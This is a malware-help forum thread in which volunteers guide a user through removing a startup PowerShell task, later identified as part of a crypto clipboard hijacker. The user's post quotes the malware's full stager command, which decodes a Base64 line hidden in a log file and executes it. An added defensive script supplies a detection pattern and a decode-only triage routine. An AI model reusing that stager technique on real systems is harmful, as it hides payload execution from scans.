Powershell.exe Malware


Solved by MKDB

I've got an instance of powershell.exe which keeps opening on startup.

It's using a bit of system resources and has a bit of a suspect command line attached to it.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script-decoded = [System.Text.Encoding]::UFT8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

I can kill the process and it doesn't start back up until Windows is restarted. I can't see anything obvious in Autoruns.

I have run Windows Defender and Malwarebytes scans but with no result. I have attached the FRST results.

Thanks in advance if you can help.

Addition.txt FRST.txt

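Added triage example (not code posted by anyone in this thread): a PowerShell script for working a command line like the one above without running the payload. It lists scheduled tasks and Run/RunOnce entries whose command mentions PowerShell, the AppV publishing script, encoded commands or Base64 decoding; it pulls the "Get-Content <file> | Select -Index <n>" reference out of a captured command line; and it decodes that line to text instead of handing it to Invoke-Command the way the stager does. Function names, the keyword list and the demo data are mine. It uses only built-in cmdlets (Get-ScheduledTask needs the ScheduledTasks module, so Windows 8 / Server 2012 or later, and an elevated prompt to see every user's tasks). The demo log is a constructed file in %TEMP%, not the real C:\Windows\logs\system-logs.txt.

```powershell
# Added triage example (not from the thread). Built-in cmdlets only; run elevated
# so Get-ScheduledTask can see tasks registered by other users.

# 1. Scheduled tasks and Run/RunOnce entries whose command line looks like a
#    PowerShell stager. The keyword list is an assumption; extend it as needed.
function Find-SuspiciousLaunchers {
    $pattern = 'powershell|pwsh|SyncAppvPublishingServer|wscript|mshta|-EncodedCommand|FromBase64String'

    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match $pattern) {
                [pscustomobject]@{ Source = 'ScheduledTask'; Name = "$($task.TaskPath)$($task.TaskName)"; Command = $cmd.Trim() }
            }
        }
    }

    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # PSPath, PSParentPath, ... are provider metadata, not entries
            if ("$($p.Value)" -match $pattern) {
                [pscustomobject]@{ Source = 'RunKey'; Name = "$key\$($p.Name)"; Command = "$($p.Value)" }
            }
        }
    }
}

# 2. From a captured command line, recover which file and which line the stager reads.
function Get-StagerReference {
    param([Parameter(Mandatory)] [string] $CommandLine)
    $re = 'Get-Content\s+(?<path>[^\s|]+)\s*\|\s*Select(?:-Object)?\s+-Index\s+(?<idx>\d+)'
    if ($CommandLine -match $re) {
        [pscustomobject]@{ Path = $Matches['path']; LineIndex = [int]$Matches['idx'] }
    }
}

# 3. Decode that line as text only. The stager feeds the result to
#    [ScriptBlock]::Create and Invoke-Command; this function never does.
function Get-StagedPayload {
    param(
        [Parameter(Mandatory)] [string] $LogPath,
        [Parameter(Mandatory)] [int]    $LineIndex     # zero-based, like Select-Object -Index
    )
    $line = Get-Content -LiteralPath $LogPath | Select-Object -Index $LineIndex
    if (-not $line) { throw "No line at index $LineIndex in $LogPath" }
    try   { $bytes = [Convert]::FromBase64String($line.Trim()) }
    catch { throw "Line $LineIndex of $LogPath is not valid Base64: $($_.Exception.Message)" }
    # The stager intends UTF-8 (the posted command line has the typo "UFT8").
    [Text.Encoding]::UTF8.GetString($bytes)
}

# --- Demo on constructed data; the file below is NOT the real system-logs.txt ---
$posted = 'powershell.exe -WindowStyle Hidden -Command &{$a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033; ...}'
Get-StagerReference -CommandLine $posted

$demoLog = Join-Path $env:TEMP 'demo-system-logs.txt'
$filler  = 1..20 | ForEach-Object { '2022-04-20 12:00:{0:D2} INFO routine entry' -f $_ }
$payload = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('Write-Host "decoy payload"'))
@($filler) + $payload | Set-Content -LiteralPath $demoLog   # payload is the 21st line, index 20
Get-StagedPayload -LogPath $demoLog -LineIndex 20

Find-SuspiciousLaunchers | Format-Table -AutoSize
```

On a real machine, point Get-StagedPayload at the path and index that Get-StagerReference recovers from the task's command line, and save the decoded text to a file for analysis (or upload it to a sandbox) rather than running it. Hiding the payload in a line of a log-looking file under C:\Windows\logs is why file-based AV scans and Autoruns can both come back clean: the persistence is a scheduled task, and the only artifact on disk is a text line.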

Hello and welcome.

I will guide you. Please do not run anything on your own, and please do not make changes on your own (outside of what I guide you to).

Do a special run with Malwarebytes for Windows, after an update run.

Start Malwarebytes. Click the Settings (gear) icon.

  • Click the Security tab.
  • Scroll down and let's be sure the line in Scan Options for "Scan for rootkits" is ON. Click it to turn it on if it does not show a blue color.
  • Now click on the General tab.
  • Do a Check for Update using the Malwarebytes Settings >> General tab.

See this Support Guide https://support.malwarebytes.com/hc/en-us/articles/360042187934-Check-for-updates-in-Malwarebytes-for-Windows

When it shows a new version available, accept it and let it proceed. Be sure it succeeds.

If prompted to do a Restart, just please follow all directions.

  • Next, the Malwarebytes scan: click the blue button marked Scan.

 

When the scan phase is done, be really sure you review and have all detected line items check-marked on the left. That too is very critical.

You can actually click the topmost left check-box on the very top line to get ALL lines ticked (all selected).

Please double verify you have that TOP check-box tick-marked, and that then all lines have a tick-mark.

Then click on the Quarantine button.

Then locate the scan run report, export a copy, and attach it to your reply.
See https://support.malwarebytes.com/hc/en-us/articles/360038479194-View-Reports-and-History-in-Malwarebytes-for-Windows-v4


Thank you. The Microsoft Safety Scanner is a free Microsoft stand-alone virus scanner that can be used to scan for & remove malware or potentially unwanted software from a system. 

The download links and how to run the tool are at this link at Microsoft:

https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download

 

Look in Scan Options, select Custom scan, and then select the C drive to be scanned.

Then start the scan. Have lots of patience. Once you start the scan and you see it has started, leave it be.

  • Once you see it has started, take a long, long break; walk away. Do not give credence to any intermediate early flash messages on the screen display. The only thing that counts is the end result at the end of the run.
  • Again, any on-screen display about repeat 'infection' is not to be relied on. Ignore those.
  • We only rely on the end result that is in the log report file.

 

This is likely to run for many hours (depending on the number of files on your machine and the speed of the hardware).

The log is named MSERT.log and will be at:

Windows\debug\msert.log

Please attach that log with your reply. We will do more later.


After the previous task is done.

This custom script is for  Veydolusta  only / for this machine only.

Be very sure to save any work files you have open at this point. Close and save any open edits, if any. Next, a custom script to do checks and some cleanups. This is really just housekeeping.

We will use FRST64 in the Downloads folder to run a custom script. The system will be rebooted after the script has run.

This custom script has some specific things, plus some general aspect to help the system overall.  

NOTE-1: This script will run a scan using System File Checker to check that all Microsoft operating system files are valid and not corrupt, and attempt to correct any invalid files. It will remove the scheduled task for SyncAppvPublishingServer.vbs.

NOTE-2: This should run a quick scan with MS Defender antivirus and remove outstanding action items, if any. This will also attempt to beef up a bit the MS Defender antivirus.

  • Please be sure to Close any open work files, documents,  any apps you started yourself  before starting this.
  • If there are any CD / DVD / or USB-flash-thumb or USB-storage drives attached,  please disconnect any of those.
  • Please save the (attached file named) FIXLIST.txt   to the   Downloads   folder

Fixlist.txt

Then start Windows Explorer and go to the Downloads folder.


Right-click on FRST64 and select Run as Administrator and allow it to proceed. Reply YES when prompted to allow it to run. If the tool warns you the version is outdated, please download and run the updated version.
If Windows prompts you about running this, select YES to allow it to proceed.

  • If you get a block message from Windows about this tool, click More info on that screen and click the Run anyway button on the next screen.
  • On the FRST window: click the Fix button just once, and wait.

 

PLEASE have lots and lots of patience when this starts. You will see a green progress bar start. Lots of patience. 
If you receive a message that a reboot is required, please make sure you allow it to restart normally.
The tool will complete its run after restart.
When finished, the tool will make a log ( Fixlog.txt) in the same location from where it was run.

Please attach the FIXLOG.txt with your next reply later, at your next opportunity.


You're welcome. I need to let you know that the VBS file related to that is not a malicious thing. It is from Microsoft. See the report on VirusTotal: https://www.virustotal.com/gui/file/b8a5c42bf6f7a14ba73660be29f5c061d30b41c6d14e42b880a4ea522f43ce66/detection/f-b8a5c42bf6f7a14ba73660be29f5c061d30b41c6d14e42b880a4ea522f43ce66-1650717198

Is there something else you need help with?


Hi @veydolusta,

 

I would like you to run another FRST fix to get an overview of another file that was related to this strange/unusual task.

I would be very grateful if you could work a few more steps.

Thank you!

 

 

Step 1

  • Please download the attached fixlist.txt file and save it to the location where you ran FRST from ( C:\Users\HP\Downloads\ ).

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST again.
  • Press the Fix button only once and wait. Please be patient.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

fixlist.txt


Hello, I apologize if my responses are a bit delayed, I have been busy with work.

Thank you again for all your efforts. I used the fixlist and posted the results below. (It gave the results immediately... maybe it failed, I don't know.)

I might also just reinstall Windows. You said that this is just a Microsoft process, but it's not normal that it launches on startup and uses 20% of the CPU every time, so something for sure must've gone wrong; a reinstall, in my opinion, would be a good option.

Fixlog.txt


Hi @veydolusta,

Thank you very much for this logfile.

 

Please do another fix for me for more details; the results should come quickly again.

In the meantime, please do not re-install Windows.

Thanks again!

 

 

 

Step 1

  • Please download the attached fixlist.txt file and save it to the location where you ran FRST from ( C:\Users\HP\Downloads\ ).

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST again.
  • Press the Fix button only once and wait. Please be patient.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

fixlist.txt


Thanks @veydolusta.

I've found suspicious code and will inform Malwarebytes Research Team for analysis.

In the meantime, please run KVRT for me:

 

Step 1

  • Please download and run the Kaspersky Virus Removal Tool to remove any found threats. More information here. Check the system drive as well so that it is scanned.
  • Let me know if it finds anything or not.

Solution

Hi @veydolusta,

how are things going?

According to the Malware Research Team, the task that was already deleted by Maurice Naggar in the first fix was indeed part of a clipboard hijacker that replaces crypto coin addresses.

 

After you have run KVRT, please do the following two steps for me.

Thanks again!

 

 

Step 1

  • Please download the attached fixlist.txt file and save it to the location where you ran FRST from ( C:\Users\HP\Downloads\ ).

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST again.
  • Press the Fix button only once and wait. Please be patient.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

 

Step 2

  • Run FRST again.
  • Do not change any settings.
  • Press the Scan button.
  • FRST will create two logs now (FRST.txt + Addition.txt) in the same directory the tool is run.
  • Please attach these logfiles to your next reply.

 

 

 

Fixlist.txt


Thank you @veydolusta.

Your logfiles look fine.

 

 

Please be careful... those .zip files may contain Unwanted Software or Adware:

Quote:

Name: Program:Win32/Uwamson.A!ml
Category: Potentially Unwanted Software
Path: file:_C:\Users\HP\Downloads\AvianaAn.zip; file:_C:\Users\HP\Downloads\BiagiottiBeauty.zip

I would stay away from these.

 

 

Please also note:

Quote:

Name: HackTool:Win32/Keygen
Path: file:_C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\adobe.snr.exe

  • Cracked, hacked or pirated programs are not only illegal, but will also make a computer a malware victim. Having such programs installed is the easiest way to get infected. It is the leading cause of ransomware encryptions. It is at times also a big source of current trojan infections. Please uninstall them now.

 

@Maurice Naggar Anything left that has to be done? You're welcome to take over and give some final instructions.

Thank you again!

 

 

 

 


Hello @veydolusta, I would suggest ensuring that this PC is all up to date with security updates and cumulative updates for Windows. Select the Windows Start button, and then go to Settings > Update & Security > Windows Update, and click Check for Updates.
Have much patience. We will clean up the tools used in a later round.


Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Please review the following to help you better protect your computer and privacy: Tips to help protect from infection

Thank you

 

 
